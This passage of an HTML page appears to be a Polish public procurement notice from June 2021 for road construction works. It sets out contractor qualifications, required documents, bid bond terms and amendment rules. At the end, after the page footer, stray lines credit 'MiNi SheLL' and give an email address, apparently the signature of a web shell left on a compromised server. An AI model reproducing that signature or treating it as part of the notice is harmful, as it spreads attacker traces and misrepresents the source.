późn. zm.) oraz przepisów ustawy o zasadach uznania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2017 r., poz.<br/>1332). Zamawiający wymaga aby osoba, która będzie pełniła funkcję kierownika budowy<br/>dysponowała co najmniej<br/>2 letnim doświadczeniem w kierowaniu robotami w specjalności inżynieryjnej drogowej bez<br/>ograniczeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>o udzielenie zamówienia publicznego:<br/>a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie udziału w postępowaniu, albo oświadczenia<br/>o przynależności tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego tej samej grupy kapitałowej;<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">) Na potwierdzenie spełnienia przez wykonawcę warunków udziału w<br/>postępowaniu:<br/>a) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamawiania publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - co najmniej 1 osoby:<br/>- kierownik budowy z uprawnieniami w specjalności inżynieryjnej drogowej bez ograniczeń oraz<br/>oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane<br/>uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający wymaga<br/>aby osoba, która będzie pełniła funkcję kierownika budowy dysponowała co najmniej 2 letnim doświadczeniem w kierowaniu robotami w specjalności inżynieryjnej drogowej bez ograniczeń.<br/>3. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>Rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. 2020 r. poz. 2415) oraz Rozporządzenia Prezesa Rady Ministrów<br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 r. poz. 2452).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający określa kwotę wadium w wysokości: 5 000,00 zł ( słownie: pięć tysięcy złotych)<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>2.1 pieniądzu,<br/>2.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo –<br/>kredytowej,<br/>z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>2.3 gwarancjach bankowych,<br/>2.4 gwarancjach ubezpieczeniowych,<br/>2.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst<br/>jednolity Dz. U. z 2019 r. poz. 310)<br/>3 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy oprocentowany<br/>wskazany przez Zamawiającego: BGK O/Rzeszów nr 22 1130 1105 0005 2488 1420 0002.<br/>Zamawiający nie dopuszcza złożenia wadium w walucie innej niż złoty polski.<br/>4 Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium<br/>w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne, w<br/>przypadku uznania rachunku zamawiającego (wpływ na konto Zamawiającego).<br/>5 W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny<br/>być one bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego,<br/>sporządzone zgodnie z obowiązującym prawem. W związku ze stanem zagrożenia<br/>epidemicznego COVID – 19 Zamawiający uzna wadium w formie gwarancji bankowej lub<br/>ubezpieczeniowej w postaci dokumentu opatrzonego kwalifikowanym podpisem elektronicznym<br/>Gwaranta lub podpisem zaufanym. Dokument wadium wniesionego w takiej postaci należy<br/>przekazać Zamawiającemu przed upływem terminu składania ofert na adres poczty<br/>elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w<br/>ust. 1.<br/>4. Jeżeli oferta Wykonawców, o których mowa w ust. 1, została wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej<br/>współpracę tych wykonawców.<br/>5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.<br/>6. W przypadku wnoszenia oferty wspólnej przez dwóch lub więcej Wykonawców każdy z nich<br/>nie może podlegać wykluczeniu z postępowania na podstawie art. 108-111 ustawy. Wykonawcy<br/>powinni wspólnie spełniać warunki udziału w postępowaniu, o których mowa w art. 112. Każdy z<br/>podmiotów występujących wspólnie musi złożyć dokumenty wymagane w celu wykazania braku<br/>podstaw do wykluczenia z postępowania w okolicznościach, o których mowa art.108 ust.1 i art.<br/>109 ust.1 pkt 4 ustawy pzp.<br/>7. Wszelka korespondencja będzie prowadzona wyłącznie z ustanowionym pełnomocnikiem <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust.1 pkt 1 ustawy pzp, możliwość<br/>dokonywania zmiany postanowień zawartej umowy w zakresie:<br/>2. Zmiany w umowie mogą dotyczyć:<br/>- zmiany terminu wykonania zamówienia,<br/>- zmiany ilości robót budowlanych,<br/>- zmiany wynagrodzenia Wykonawcy,<br/>- zmiana w zakresie podwykonawstwa,<br/>- zmian rozwiązań technicznych lub technologicznych,<br/>- zmian sposobu wykonania zamówienia,<br/>- zmiany producenta materiałów budowlanych, urządzeń,<br/>- zmiany wymiarów, położenia lub wysokości części robót budowlanych,<br/>- zmiany kierownika robót.<br/>3. Zmiana postanowień umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez<br/>przedłużenie terminów w przypadku:<br/>- przestojów i opóźnień zawinionych przez Zamawiającego<br/>- działań siły wyższej (np. klęski żywiołowej, strajki generalne lub lokalne), wystąpienia<br/>nieprzewidzianych okoliczności uniemożliwiających realizację kontraktu poprzez specyfikę<br/>sytuacji społeczno-gospodarczej wywołanej np. pandemią COVID-19 na obszarze Polski,<br/>mające bezpośredni wpływ na terminowość,<br/>- wystąpienia niekorzystnych warunków atmosferycznych a w szczególności z powodu niskich<br/>temperatur w dzień lub w nocy z powodu wystąpienia zmarzliny gruntu lub z powodu<br/>intensywnych opadów deszczu– fakty te muszą mieć charakter ciągły i być potwierdzone przez<br/>inspektora nadzoru.<br/>- wystąpienia wad dokumentacji projektowej skutkujących koniecznością dokonania zmian<br/>w dokumentacji projektowej,<br/>- wystąpienia konieczności wykonania robót dodatkowych lub zamiennych, udzielenie zamówień<br/>dodatkowych. które wstrzymują lub opóźniają realizację przedmiotu umowy,<br/>4. W przedstawionych w ust. 3 przypadkach wystąpienie opóźnień lub wstrzymania realizacji, strony mogą ustalić nowe terminy realizacji robót i rozliczenia końcowego, z tym, że<br/>maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy, postoju<br/>lub okresowi niezbędnemu do wykonania robót nieprzewidzianych w przedmiarze robót.<br/>5. W przypadku konieczności zmiany terminu realizacji umowy Wykonawca zobowiązany jest<br/>wystąpić<br/>z wnioskiem do Zamawiającego. Wniosek powinien zawierać szczegółowe uzasadnienie zmiany<br/>terminu.<br/>6. Zmiana postanowień umowy w stosunku do treści oferty poprzez przedłużenie terminu<br/>zakończenia robót w przypadku:<br/>- zamian technologicznych – o ile są korzystne dla Zamawiającego i spowodowane są w<br/>szczególności:<br/>a) pojawianiem się na rynku materiałów lub urządzeń nowej generacji pozwalających na<br/>zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego<br/>przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;<br/>b) pojawienie się nowszej technologii wykonania i zaprojektowanych robót pozwalającej na<br/>zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonanych prac, jak również kosztów<br/>eksploatacji wykonanego przedmiotu umowy;<br/>- odbiegających w sposób istotny od przyjętych w dokumentacji projektowej warunków<br/>geologicznych, geotechnicznych lub hydrologicznych, rozpoznania terenu w zakresie znalezisk<br/>archeologicznych, występowania niewybuchów lub niewypałów które mogą skutkować w świetle<br/>dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu umowy,<br/>- odbiegających w sposób istotny od przyjętych w dokumentacji projektowej warunków terenu<br/>budowy,<br/>w szczególności napotkania nie zinwentaryzowanych lub błędnie zinwentaryzowanych sieci,<br/>instalacji,<br/>7. Wszelkie zmiany umowy wymagają uprzedniej pisemnej akceptacji stron przez umocowanych<br/>do tego przedstawicieli obu stron i jeżeli dotyczą one istotnych zmian umowy muszą być<br/>sporządzone w formie pisemnego aneksu, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami skompresowana do jednego pliku archiwum . zip za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/ .</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com